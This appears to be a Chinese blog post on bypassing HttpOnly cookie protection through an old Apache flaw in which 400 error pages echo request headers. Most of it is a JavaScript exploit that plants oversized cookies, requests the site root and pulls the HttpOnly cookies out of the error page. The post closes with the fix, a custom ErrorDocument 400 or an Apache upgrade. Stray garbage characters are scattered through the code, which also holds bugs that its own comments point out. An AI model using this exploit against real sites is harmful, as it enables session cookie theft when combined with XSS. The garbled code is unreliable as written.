很多程序以及一些商业或成熟开源的CMS文章系统,为了防止XSS盗取用户cookie,一般都会给cookie加上HttpOnly属性,禁止直接用JS读取用户的cookie,从而降低XSS的危害;而这个问题刚好可以用来绕过cookie的HttpOnly属性。

用Chrome打开一个站点,按F12打开开发者工具,切换到Console,输入如下代码并回车:

// http://www.exploit-db.com/exploits/18442/
/**
 * Sets (or clears) ten cookies named xss0..xss9 on the current origin.
 *
 * With `good` falsy, every cookie gets an 819-character value, so the ten of
 * them together push the Cookie request header to roughly 8 KB; with `good`
 * truthy the same cookies are re-set with an expiry in the past, which makes
 * the browser drop them. The header size is presumably chosen to exceed the
 * server's request-header limit so that it answers 400 -- the post states
 * that on a vulnerable Apache the 400 error page echoes the request headers,
 * cookies included, which is what defeats HttpOnly.
 *
 * Defender notes: the cookie names (`xss` + digit) and a burst of 400
 * responses for "/" are the observable footprint; the page's fixes are a
 * custom `ErrorDocument 400` message or upgrading Apache.
 *
 * @param {boolean} [good] - truthy: expire the cookies; falsy/omitted: set them.
 * @returns {undefined}
 */
0 @2 M5 ^- r V: \function setCookies (good) {
4 l. n6 }' o) {. F// Construct string for cookie value
, f& B( c/ v z: s+ y1 Jvar str = "";4 c$ [& Y4 V! e# x
for (var i=0; i< 819; i++) {$ b3 y- T$ F+ W" ?. c
str += "x";5 a% T: r9 R7 g% s- z
}- z: x5 I! u" T; ?% Z/ C' F: k
// Set cookies# X3 g' \4 O4 g/ ~1 C% H
// `i` is reused from the loop above (declared with var, so function-scoped)
for (i = 0; i < 10; i++) {
" I6 u0 C+ p7 x4 ^2 g3 O// Expire evil cookie1 D/ C, w. D% `' c' P9 [
if (good) {9 B! n) v8 ?# z5 l: d- t0 Z
// Empty value plus an expires date one millisecond in the past removes the cookie
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
8 h5 |- d# e e+ J}1 \7 R7 @9 z K, n( _; j
// Set evil cookie, E. U3 n& T! c! d
else {) E$ g; E$ t$ y/ P$ a
// Value is the 819 x's; path=/ so it is sent with the request to "/" below
var cookie = "xss"+i+"="+str+";path=/";* F& C. x9 o9 a: R) m3 J; X+ c9 A
}; ?: j% W, Z4 s9 e1 b
document.cookie = cookie;4 Y- n I- Q; H+ c$ @
}; p6 G3 u+ m8 Q: f* C* D
}
/**
 * Plants the oversized cookies, requests "/" via XHR and, if the reply is a
 * 400 error page, parses the cookie names/values echoed inside its <pre>
 * block, clears the planted cookies again and shows the result in an alert.
 *
 * `xhr` is declared with `var` after parseCookies is defined; because the
 * handler only runs on readystatechange, after the assignment below, the
 * hoisted binding is already set when it is read.
 *
 * @returns {undefined}
 */
^4 z% i" Z; \- \4 Ofunction makeRequest() {' Q+ z; _9 P2 c7 q
// Called without an argument, so `good` is undefined and the "evil" branch runs
setCookies();- t {5 J; c4 i8 p+ O
// readystatechange handler: extracts the echoed Cookie header from the 400 page
function parseCookies () {5 Y; W% b8 Q& X: w0 l( r. N
var cookie_dict = {};* x& `) R/ S0 ~; h; i
// Only react on 400 status: ^0 |8 z. N0 N r5 Z+ h1 S
// readyState 4 = request finished; the error page is what carries the echoed header
if (xhr.readyState === 4 && xhr.status === 400) {
6 U, J* O# V4 c9 I# _// Replace newlines and match <pre> content
// NOTE(review): match() returns null when there is no <pre>, so `content.length` below would throw in that case
7 d6 h, t; \$ s( Vvar content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);- V$ v" j; O+ B' {, ?% @. y, G
if (content.length) {
4 b' \+ y1 i2 v. U# c! \// Remove Cookie: prefix" |/ z+ G5 j8 u7 d* |& Q
content = content[1].replace("Cookie: ", "");# g2 Z9 g: |7 ]9 T* l; n6 N
// Drop the planted xss<digit> cookies, then split the remaining header on ';'
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
! B+ y9 c7 L. C8 I4 l- ?9 r! }// Add cookies to object7 @. L6 ]# x1 f0 w( H v _
for (var i=0; i<cookies.length; i++) {
// NOTE(review): `cookies` is an array at this point, so this call will not run as pasted; left unchanged
. f. H* b3 A5 m$ r" C ?4 X& Gvar s_c = cookies.split('=',2);4 [; d4 i4 C0 y3 E% e% o+ y+ B1 p
cookie_dict[s_c[0]] = s_c[1];
, W* u- b, Z3 e( k# K}! b0 Q6 {8 n/ @" {2 i
}4 w! B$ u" w! @; b6 G$ s1 S9 m
// Unset malicious cookies
// Re-sets the planted cookies with a past expiry so the browser removes them
/ `& Q, j! Y% X. @' f B9 RsetCookies(true);4 e$ b8 X( N m# c. ~" ^
// Shows whatever the server echoed back, including HttpOnly cookies if present
alert(JSON.stringify(cookie_dict));$ [. v6 z) @$ H: c( V
}$ B/ B8 l3 Q& I f) U8 f
}
' }$ X' t) _& b: t2 f2 ~1 o/ p// Make XHR request' k$ H; y' A) }+ e5 M3 @
var xhr = new XMLHttpRequest();
! `) H- \ g* v2 U% V9 n9 b: {xhr.onreadystatechange = parseCookies;
// Asynchronous GET of the site root; the path=/ cookies set above ride along automatically
# Y8 `4 w$ q9 ~; N$ b) Y" P! zxhr.open("GET", "/", true);) M. M. a) v4 [$ Z6 D
xhr.send(null);7 p- \7 u- p) m9 ^/ I: X
}
// Entry point: runs once when the snippet is pasted into the browser console
7 {7 Q' u1 _7 x9 M4 cmakeRequest();

你就能看见华丽丽的400错误页面,其中包含着cookie信息。

下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download
修复方案:

Apache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下:

In the event of a problem or error, Apache can be configured to do one of four things:

1. output a simple hardcoded error message(输出一个简单生硬的错误代码信息)
2. output a customized message(输出一段自定义的信息)
3. redirect to a local URL-path to handle the problem/error(转向一个本地的自定义页面)
4. redirect to an external URL to handle the problem/error(转向一个外部URL)

经测试,对于400错误只有方法2有效,此时返回包不会再包含cookie内容。

Apache配置:

ErrorDocument 400 "security test"

当然,升级Apache到最新版本也可以:)。

参考:http://httpd.apache.org/security/vulnerabilities_22.html